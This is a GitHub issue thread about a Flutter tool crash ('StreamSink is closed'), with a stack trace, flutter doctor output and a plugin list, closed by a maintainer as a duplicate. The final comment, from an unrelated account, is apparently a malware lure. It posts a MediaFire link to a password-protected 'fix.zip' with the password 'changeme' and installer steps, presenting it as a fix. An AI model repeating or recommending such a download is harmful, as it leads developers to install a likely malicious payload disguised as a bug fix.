### ISSUE TITLE
[tool_crash] StateError: Bad state: StreamSink is closed

### ISSUE THREAD

**Issue by poojabiizlo** [flutter/flutter#154240] opened 2024-08-28 09:32 UTC
## Command
```sh
flutter --no-color run --machine --track-widget-creation --device-id=b9195d0d --start-paused --dart-define=flutter.inspector.structuredErrors=true lib/main.dart
```

## Steps to Reproduce
1. ...
2. ...
3. ...

## Logs
StateError: Bad state: StreamSink is closed
```console
#0      _StreamSinkImpl.add (dart:_http/http_impl.dart:912:7)
#1      _WebSocketImpl.add (dart:_http/websocket_impl.dart:1222:11)
#2      VmService._call.<anonymous closure> (package:vm_service/src/vm_service.dart:1785:22)
#3      VmService._call (package:vm_service/src/vm_service.dart:1787:8)
#4      VmService.callServiceExtension (package:vm_service/src/vm_service.dart:1725:14)
#5      VmService.callMethod (package:vm_service/src/vm_service.dart:1716:12)
#6      FlutterVmService.callMethodWrapper (package:flutter_tools/src/vmservice.dart:503:28)
#7      FlutterVmService.getFlutterViews (package:flutter_tools/src/vmservice.dart:934:51)
<asynchronous suspension>
#8      ResidentRunner.connectToServiceProtocol (package:flutter_tools/src/resident_runner.dart:1418:7)
<asynchronous suspension>
#9      HotRunner.attach (package:flutter_tools/src/run_hot.dart:236:7)
<asynchronous suspension>
#10     AppDomain.launch.<anonymous closure> (package:flutter_tools/src/commands/daemon.dart:815:9)
<asynchronous suspension>
#11     AppDomain.launch (package:flutter_tools/src/commands/daemon.dart:813:5)
<asynchronous suspension>
#12     RunCommand.runCommand (package:flutter_tools/src/commands/run.dart:754:15)
<asynchronous suspension>
#13     FlutterCommand.run.<anonymous closure> (package:flutter_tools/src/runner/flutter_command.dart:1396:27)
<asynchronous suspension>
#14     AppContext.run.<anonymous closure> (package:flutter_tools/src/base/context.dart:153:19)
<asynchronous suspension>
#15     CommandRunner.runCommand (package:args/command_runner.dart:212:13)
<asynchronous suspension>
```
```console
[!] Flutter (Channel beta, 3.23.0-0.1.pre, on macOS 14.4.1 23E224 darwin-arm64, locale en-IN)
    • Flutter version 3.23.0-0.1.pre on channel beta at /Users/pooja/development/flutter
    ! Warning: `dart` on your path resolves to /opt/homebrew/Cellar/dart/3.1.5/libexec/bin/dart, which is not inside your current Flutter SDK checkout at /Users/pooja/development/flutter. Consider adding /Users/pooja/development/flutter/bin to the front of your path.
    • Upstream repository https://github.com/flutter/flutter.git
    • Framework revision 2feea7a407 (3 months ago), 2024-06-06 10:19:10 +0700
    • Engine revision bb10c54666
    • Dart version 3.5.0 (build 3.5.0-180.3.beta)
    • DevTools version 2.36.0
    • If those were intentional, you can disregard the above warnings; however it is recommended to use "git" directly to perform update checks and upgrades.

[✓] Android toolchain - develop for Android devices (Android SDK version 34.0.0)
    • Android SDK at /Users/pooja/Library/Android/sdk
    • Platform android-34, build-tools 34.0.0
    • Java binary at: /Applications/Android Studio.app/Contents/jbr/Contents/Home/bin/java
    • Java version OpenJDK Runtime Environment (build 17.0.10+0-17.0.10b1087.21-11572160)
    • All Android licenses accepted.

[✓] Xcode - develop for iOS and macOS (Xcode 15.4)
    • Xcode at /Applications/Xcode.app/Contents/Developer
    • Build 15F31d
    • CocoaPods version 1.15.2

[✓] Chrome - develop for the web
    • Chrome at /Applications/Google Chrome.app/Contents/MacOS/Google Chrome

[✓] Android Studio (version 2023.3)
    • Android Studio at /Applications/Android Studio.app/Contents
    • Flutter plugin can be installed from:
      🔨 https://plugins.jetbrains.com/plugin/9212-flutter
    • Dart plugin can be installed from:
      🔨 https://plugins.jetbrains.com/plugin/6351-dart
    • Java version OpenJDK Runtime Environment (build 17.0.10+0-17.0.10b1087.21-11572160)

[✓] Connected device (4 available)
    • CPH2527 (mobile)                • b9195d0d              • android-arm64  • Android 14 (API 34)
    • macOS (desktop)                 • macos                 • darwin-arm64   • macOS 14.4.1 23E224 darwin-arm64
    • Mac Designed for iPad (desktop) • mac-designed-for-ipad • darwin         • macOS 14.4.1 23E224 darwin-arm64
    • Chrome (web)                    • chrome                • web-javascript • Google Chrome 128.0.6613.85

[✓] Network resources
    • All expected network resources are available.

! Doctor found issues in 1 category.

```

## Flutter Application Metadata
**Type**: malformed
**Version**: 1.0.0+1
**Material**: true
**Android X**: false
**Module**: false
**Plugin**: false
**Android package**: null
**iOS bundle identifier**: null
**Creation channel**: null
**Creation framework version**: null
### Plugins
device_info_plus-10.1.2
firebase_core-2.32.0
firebase_core_web-2.17.4
firebase_messaging-14.9.4
firebase_messaging_web-3.8.7
flutter_plugin_android_lifecycle-2.0.21
local_auth-2.3.0
local_auth_android-1.0.43
local_auth_darwin-1.4.0
local_auth_windows-1.0.11
location-7.0.0
location_web-5.0.3
path_provider_linux-2.2.1
path_provider_windows-2.3.0
permission_handler-11.3.1
permission_handler_android-12.0.12
permission_handler_apple-9.4.5
permission_handler_html-0.1.3+2
permission_handler_windows-0.2.1
safe_device-1.1.8
shared_preferences-2.3.2
shared_preferences_android-2.3.1
shared_preferences_foundation-2.5.2
shared_preferences_linux-2.4.1
shared_preferences_web-2.4.2
shared_preferences_windows-2.4.1

**Comment by danagbemava-nc** [comment] 2024-08-28 10:10
Closing this as a duplicate of https://github.com/flutter/flutter/issues/150759

**Closed by danagbemava-nc** 2024-08-28 10:10 UTC
Labels: in triage

**Comment by HTneko** [comment] 2024-08-28 10:21
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
